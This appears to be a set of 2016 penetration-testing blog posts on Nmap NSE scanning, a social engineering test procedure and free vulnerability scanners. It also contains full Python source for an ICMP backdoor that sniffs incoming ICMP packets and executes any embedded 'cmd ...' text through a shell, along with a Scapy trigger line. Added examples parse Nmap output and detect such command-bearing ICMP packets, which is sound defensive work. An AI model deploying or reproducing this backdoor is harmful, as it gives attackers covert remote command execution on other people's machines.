Monday, October 10, 2016

Using Nmap to launch a vulnerability scan.


First, update the NSE script database by running the command below.
nmap --script-updatedb

Second, enable the script-based vulnerability scanning functionality by adding the -sC argument as shown below. Note that -sC runs the scripts in NSE's "default" category; the scripts that specifically check for known vulnerabilities belong to the "vuln" category, which is selected with --script vuln.

nmap -sC 192.168.0.1
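Once the scan has run, the script results are easiest to triage from Nmap's XML output (-oX) rather than from the console text. The following is an added example, not code from the original post: it parses the nmaprun/host/ports/port/script structure that Nmap writes, keeps only results on open ports, and flags outputs containing a few risk keywords for manual review. The SAMPLE_XML document and the RISK_KEYWORDS list are constructed assumptions for offline use; the function names are my own.

```python
#!/usr/bin/env python3
# Added example (not from the original post): summarise NSE script findings
# from Nmap's XML output, e.g. the file produced by "nmap -sC -oX scan.xml <host>".
# SAMPLE_XML is constructed for offline testing; the element and attribute
# names follow Nmap's XML format (nmaprun/host/ports/port/state/service/script).
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sC -oX scan.xml 192.168.0.1">
  <host>
    <status state="up"/>
    <address addr="192.168.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh"/>
        <script id="ssh-hostkey" output="2048 11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00 (RSA)"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http"/>
        <script id="http-title" output="Router Admin"/>
        <script id="http-methods" output="Potentially risky methods: TRACE"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed"/>
        <service name="telnet"/>
        <script id="banner" output="constructed: must be ignored, port is closed"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Heuristic keywords that mark a script result for manual review. Assumption:
# these strings are common in NSE output, but the list is not exhaustive.
RISK_KEYWORDS = ("vulnerable", "risky", "anonymous", "default credential")


def parse_script_results(xml_text):
    """Return one dict per NSE script result found on an open port."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr = ""
        for address in host.findall("address"):
            if address.get("addrtype") == "ipv4":
                addr = address.get("addr", "")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry nothing worth triaging
            service = port.find("service")
            service_name = service.get("name", "") if service is not None else ""
            for script in port.findall("script"):
                results.append({
                    "host": addr,
                    "port": int(port.get("portid")),
                    "protocol": port.get("protocol", ""),
                    "service": service_name,
                    "script": script.get("id", ""),
                    "output": script.get("output", ""),
                })
    return results


def flag_for_review(results):
    """Subset of results whose output contains a risk keyword (case-insensitive)."""
    flagged = []
    for result in results:
        text = result["output"].lower()
        if any(keyword in text for keyword in RISK_KEYWORDS):
            flagged.append(result)
    return flagged


if __name__ == "__main__":
    # For a real scan, replace SAMPLE_XML with open("scan.xml").read().
    findings = parse_script_results(SAMPLE_XML)
    for r in findings:
        print("%s:%d/%s %s [%s] %s" % (r["host"], r["port"], r["protocol"],
                                       r["service"], r["script"], r["output"]))
    print("flagged for review:", [r["script"] for r in flag_for_review(findings)])
```

Run it against a real file by swapping SAMPLE_XML for the contents of the -oX output; the keyword filter is only a first pass, so every script result on an open port is still worth a look.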

A Social Engineering test procedure, in my opinion.

The Social Engineering (SE) test procedure, like the technical test, is composed of five steps: Reconnaissance, Confirmation, Implementation, Analysis and Report. Here is the detail of each step:
1) Reconnaissance: Use social platforms such as Google and LinkedIn to locate candidates who may become test targets.
2) Confirmation: Confirm the test methodologies and the individuals chosen as targets with the client before documenting the test plan. Bear in mind that the client should not know the precise time frame of the implementation in advance, so that the client's incident response ability can be assessed.
3) Implementation: Launch the SE test in accordance with the test plan; record every reaction from the targets during the implementation.
4) Analysis: Analyze the reactions. Normally, the client's incident response team may confirm the situation with the SE team.
5) Report: Document the analysis report after the SE test is done, and submit it before holding a meeting to discuss the results in detail.



Saturday, October 8, 2016

Free traditional vulnerability scanners

In cases where fuzz scanning, such as SQL injection and XSS scanning, cannot be carried out, traditional vulnerability scanning becomes more important, so that penetration testers can find as many vulnerabilities in the targets as possible. Some free traditional vulnerability scanners are listed below.


  • OpenVAS
  • Armitage (based on Metasploit Framework)
  • Sparta (based on Nmap and Nikto)

I would welcome more names from you, readers. Thank you.

Saturday, October 1, 2016

An ICMP backdoor I wrote recently.

#!/usr/bin/python
#Written by demonalex on Oct 1, 2016
#PoC with Scapy: send(IP(dst="192.168.0.3")/ICMP()/"cmd echo 1 > c:\test.txt")
#Note: Python 2 code. socket.SIO_RCVALL / RCVALL_ON exist only on Windows and need administrator privileges.
import socket, re, sys, subprocess

host = socket.gethostname()

#A raw sniffer dedicated to ICMP
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((host,0))

s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

#Enable promiscuous mode so that every incoming packet is delivered to the socket
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

while 1:
    # receive a packet; recvfrom() returns a (data, address) tuple
    icmp_packet = s.recvfrom(65535)
    # str() of that tuple is what the regex below searches; the "', ('" tail
    # is the boundary between the raw data and the sender address
    ipacket=str(icmp_packet)
    #print type(ipacket), ":", ipacket
    try:
        matchstr = re.search(r'cmd (.*)\', \(\'', ipacket, re.M|re.I)
        if matchstr:
            #print matchstr.group(1)
            command = matchstr.group(1)
            subprocess.check_output(command, shell=True)
            #print "Executed \'", command, "\'"
    except:
        print "Execution failed."
        continue

# disable promiscuous mode (never reached: the loop above does not exit)
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
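From the defender's side, the weak point of this kind of channel is that the command text travels in the clear inside an ICMP echo payload, where a normal ping carries a fixed, well-known pattern. The following is an added example, not part of the original post: it parses raw IPv4/ICMP bytes, whitelists the stock Windows ping payload, and reports any echo packet whose payload matches the "cmd ..." trigger (or simply deviates from the expected pattern) so that an analyst can review it. The sample packets are constructed in-line with the helper build_echo; the function names and the single whitelisted payload are my own assumptions.

```python
#!/usr/bin/env python3
# Added example (not from the original post): a defender-side check that
# parses raw IPv4/ICMP packets and flags echo payloads that look like the
# "cmd ..." trigger used by the backdoor above. Sample packets are constructed
# in-line; parse_ipv4_icmp, classify_payload and scan are my own names.
import re
import struct

# Payload sent by the Windows ping utility by default (32 bytes).
# Assumption: only this payload is whitelisted; other tools' payloads are
# reported as "nonstandard" for an analyst to review.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"

# Command-like text: the backdoor on this page triggers on "cmd <anything>".
COMMAND_RE = re.compile(rb"\bcmd\s+\S", re.IGNORECASE)

ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST = 0, 8


def parse_ipv4_icmp(packet):
    """Return (icmp_type, icmp_code, payload) for an IPv4 ICMP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4          # IPv4 header length in bytes
    if packet[9] != 1 or len(packet) < ihl + 8:
        return None                       # not ICMP, or truncated
    icmp_type, icmp_code = packet[ihl], packet[ihl + 1]
    payload = packet[ihl + 8:]            # after type/code/checksum/id/seq
    return icmp_type, icmp_code, payload


def classify_payload(payload):
    """'benign' for the stock Windows ping payload, 'command-like' for text
    matching the backdoor trigger, 'nonstandard' for anything else."""
    if payload == WINDOWS_PING_PAYLOAD:
        return "benign"
    if COMMAND_RE.search(payload):
        return "command-like"
    return "nonstandard"


def scan(packets):
    """Return [(index, verdict)] for echo packets that are not benign."""
    findings = []
    for i, pkt in enumerate(packets):
        parsed = parse_ipv4_icmp(pkt)
        if parsed is None:
            continue
        icmp_type, _, payload = parsed
        if icmp_type not in (ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST):
            continue
        verdict = classify_payload(payload)
        if verdict != "benign":
            findings.append((i, verdict))
    return findings


# --- helpers used only to build constructed test packets --------------------
def icmp_checksum(data):
    """RFC 1071 ones'-complement checksum over data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(payload, src=b"\xc0\xa8\x00\x02", dst=b"\xc0\xa8\x00\x03"):
    """Minimal IPv4 + ICMP echo request carrying payload (IP checksum left 0)."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, 1, 1)
    csum = icmp_checksum(header + payload)
    icmp = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, 1, 1) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0, src, dst)
    return ip + icmp


# Constructed sample capture: a normal Windows ping, the PoC payload from the
# post above, and an all-zero payload that matches no known tool.
SAMPLE_PACKETS = [
    build_echo(WINDOWS_PING_PAYLOAD),
    build_echo(b"cmd echo 1 > c:\\test.txt"),
    build_echo(b"\x00" * 56),
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_PACKETS):
        print("packet %d: %s" % (index, verdict))
```

In a real deployment the packets would come from a capture file or a raw socket on a monitoring host rather than from SAMPLE_PACKETS; the keyword rule catches this particular PoC, while the "nonstandard" verdict is the more general signal that something other than a ping utility is using ICMP.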